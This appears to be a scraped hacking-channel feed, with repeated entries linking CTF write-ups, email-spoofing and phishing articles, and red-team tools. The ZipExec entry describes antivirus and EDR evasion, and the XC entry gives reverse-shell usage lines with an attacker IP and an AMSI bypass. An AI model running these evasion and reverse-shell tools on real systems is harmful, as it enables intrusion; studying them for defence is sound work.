Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe: Daily Bugle (OSCP approved tools)
https://cdn-images-1.medium.com/max/1145/1*x5hsVtACxKyFmVOB3yQOZg.png
This Hard TryHackMe room is a Content Management System using Joomla. The Joomla instance is vulnerable to a public exploit. We then crack…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe: Daily Bugle (OSCP approved tools)
https://cdn-images-1.medium.com/max/1145/1*x5hsVtACxKyFmVOB3yQOZg.png
This Hard TryHackMe room is a Content Management System using Joomla. The Joomla instance is vulnerable to a public exploit. We then crack…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe: Daily Bugle (OSCP approved tools)
This Hard TryHackMe room is a Content Management System using Joomla. The Joomla instance is vulnerable to a public exploit. We then crack…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Pikaboo
https://cdn-images-1.medium.com/max/720/0*BI3VRD78vnARR40t.png
As always, we start with nmap to discover open ports/services.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Pikaboo
https://cdn-images-1.medium.com/max/720/0*BI3VRD78vnARR40t.png
As always, we start with nmap to discover open ports/services.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Pikaboo
As always, we start with nmap to discover open ports/services.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
UnWordle
https://cdn-images-1.medium.com/max/600/1*5draOF8Brekd9UqNO8Uq5w.png
How I hacked into the popular word game.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
UnWordle
https://cdn-images-1.medium.com/max/600/1*5draOF8Brekd9UqNO8Uq5w.png
How I hacked into the popular word game.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
UnWordle
How I hacked into the popular word game.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HTB: Node Writeup w/o Metasploit
https://cdn-images-1.medium.com/max/600/0*Hj-62WbgyuzZqL_s.png
Introduction
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
HTB: Node Writeup w/o Metasploit
https://cdn-images-1.medium.com/max/600/0*Hj-62WbgyuzZqL_s.png
Introduction
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HTB: Node Writeup w/o Metasploit
Introduction
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Forge
https://cdn-images-1.medium.com/max/1050/0*22hQiMej9HQoTz9c.png
As always we start with nmap to discover open ports.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Forge
https://cdn-images-1.medium.com/max/1050/0*22hQiMej9HQoTz9c.png
As always we start with nmap to discover open ports.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Forge
As always we start with nmap to discover open ports.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Agente de acceso inicial involucrado en ataques de Log4Shell contra servidores VMware Horizon
https://cdn-images-1.medium.com/max/1527/0*skQbv2gP2cH_cPWO
PUBLICADO EN 26 ENERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Agente de acceso inicial involucrado en ataques de Log4Shell contra servidores VMware Horizon
https://cdn-images-1.medium.com/max/1527/0*skQbv2gP2cH_cPWO
PUBLICADO EN 26 ENERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Agente de acceso inicial involucrado en ataques de Log4Shell contra servidores VMware Horizon
PUBLICADO EN 26 ENERO, 2022POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
ZipExec : A Unique Technique To Execute Binaries From A Password Protected Zip
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.
Installation
The first step as always is to clone the repo. Before you compile ZipExec you’ll need to install the dependencies. To install them, run following commands:
go get github.com/yeka/zip
Then build it
go build ZipExec.go
or
go get github.com/Tylous/ZipExec
Help
./ZipExec -h
_.
____ /||_ / _ _
/ / | _ | )\ \/ // _/ \ / / | | |> > > <\/\ __
/ |_| / //_ \__ >___ >
\/ |__| \/ \/ \/ \/
(@Tyl0us)
Usage of ./ZipExec:
-I string
Path to the file containing binary to zip.
-O string
Name of output file (e.g. loader.js)
-sandbox
Enables sandbox evasion using IsDomainedJoined.
Download
___________________________
@hacking_Attack
@Hacking_Video
ZipExec : A Unique Technique To Execute Binaries From A Password Protected Zip
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.
Installation
The first step as always is to clone the repo. Before you compile ZipExec you’ll need to install the dependencies. To install them, run following commands:
go get github.com/yeka/zip
Then build it
go build ZipExec.go
or
go get github.com/Tylous/ZipExec
Help
./ZipExec -h
_.
____ /||_ / _ _
/ / | _ | )\ \/ // _/ \ / / | | |> > > <\/\ __
/ |_| / //_ \__ >___ >
\/ |__| \/ \/ \/ \/
(@Tyl0us)
Usage of ./ZipExec:
-I string
Path to the file containing binary to zip.
-O string
Name of output file (e.g. loader.js)
-sandbox
Enables sandbox evasion using IsDomainedJoined.
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
ZipExec : A Unique Technique To Execute Binaries
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
XC : A Small Reverse Shell For Linux And Windows
XC is a Netcat like reverse shell for Linux & Windows.
Features
Windows
Usage:
└ Shared Commands: !exit
!upload
* uploads a file to the target
!download
* downloads a file from the target
!lfwd
* local portforwarding (like ssh -L)
!rfwd
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd
* removes forward by index
!plugins
* lists available plugins
!plugin
* execute a plugin
!spawn
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas
* restart xc with the specified user
!met
* connects to a x64/meterpreter/reverse_tcp listener └ OS Specific Commands: !powershell
* starts powershell with AMSI Bypass
!rc
* connects to a local bind shell and restarts this client over it
!runasps
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities
*
Linux
Usage:
└ Shared Commands: !exit
!upload
* uploads a file to the target
!download
* downloads a file from the target
!lfwd
* local portforwarding (like ssh -L)
!rfwd
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd
* removes forward by index
!plugins
* lists available plugins
!plugin
* execute a plugin
!spawn
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas
* restart xc with the specified user
!met
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!ssh
* starts sshd with the configured keys on the specified port
*
Examples
* Linux Attacker:
* WindowsVictim :
* Argumentless:
Setup
Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu:
git clone –recurse-submodules https://github.com/xct/xc.git
GO111MODULE=off go get golang.org/x/sys/…
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx
Linux
python3 build.py
Download
___________________________
@hacking_Attack
@Hacking_Video
XC : A Small Reverse Shell For Linux And Windows
XC is a Netcat like reverse shell for Linux & Windows.
Features
Windows
Usage:
└ Shared Commands: !exit
!upload
* uploads a file to the target
!download
* downloads a file from the target
!lfwd
* local portforwarding (like ssh -L)
!rfwd
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd
* removes forward by index
!plugins
* lists available plugins
!plugin
* execute a plugin
!spawn
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas
* restart xc with the specified user
!met
* connects to a x64/meterpreter/reverse_tcp listener └ OS Specific Commands: !powershell
* starts powershell with AMSI Bypass
!rc
* connects to a local bind shell and restarts this client over it
!runasps
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities
*
Linux
Usage:
└ Shared Commands: !exit
!upload
* uploads a file to the target
!download
* downloads a file from the target
!lfwd
* local portforwarding (like ssh -L)
!rfwd
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd
* removes forward by index
!plugins
* lists available plugins
!plugin
* execute a plugin
!spawn
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas
* restart xc with the specified user
!met
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!ssh
* starts sshd with the configured keys on the specified port
*
Examples
* Linux Attacker:
rlwrap xc -l -p 1337(Server)* WindowsVictim :
xc.exe 10.10.14.4 1337(Client)* Argumentless:
xc_10.10.14.4_1337.exe(Client)Setup
Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu:
go version go1.16.2 linux/amd64and kali go version go1.15.9 linux/amd64git clone –recurse-submodules https://github.com/xct/xc.git
GO111MODULE=off go get golang.org/x/sys/…
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx
Linux
python3 build.py
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
XC : A Small Reverse Shell For Linux And Windows
XC is a Netcat like reverse shell for Linux & Windows. Features Windows Usage: └ Shared Commands: !exit !upload
How to spoof e-mails. (DMARC, SPF, and Phishing)
https://popalltheshells.medium.com/how-to-spoof-e-mails-dmarc-spf-and-phishing-5184c10679a0?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://popalltheshells.medium.com/how-to-spoof-e-mails-dmarc-spf-and-phishing-5184c10679a0?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to spoof e-mails. (DMARC, SPF, and Phishing)
Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved.
Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved.Continue reading on Medium » (https://popalltheshells.medium.com/how-to-spoof-e-mails-dmarc-spf-and-phishing-5184c10679a0?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to spoof e-mails. (DMARC, SPF, and Phishing)
Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved.
Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA
https://www.reddit.com/r/redteamsec/comments/sdbez1/evolved_phishing_device_registration_trick_adds/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/EvolvedPhishing) [comments] (https://www.reddit.com/r/redteamsec/comments/sdbez1/evolved_phishing_device_registration_trick_adds/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/sdbez1/evolved_phishing_device_registration_trick_adds/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/EvolvedPhishing) [comments] (https://www.reddit.com/r/redteamsec/comments/sdbez1/evolved_phishing_device_registration_trick_adds/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Evolved phishing: Device registration trick adds to phishers’...
Posted in r/redteamsec by u/SCI_Rusher • 3 points and 0 comments
chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode loader for opsec & profit
https://www.reddit.com/r/redteamsec/comments/sdbiys/chvancootennimpacktv1_nimbased_assembly_packer/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://github.com/chvancooten/NimPackt-v1) [comments] (https://www.reddit.com/r/redteamsec/comments/sdbiys/chvancootennimpacktv1_nimbased_assembly_packer/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/sdbiys/chvancootennimpacktv1_nimbased_assembly_packer/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://github.com/chvancooten/NimPackt-v1) [comments] (https://www.reddit.com/r/redteamsec/comments/sdbiys/chvancootennimpacktv1_nimbased_assembly_packer/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode...
Posted in r/redteamsec by u/dmchell • 3 points and 0 comments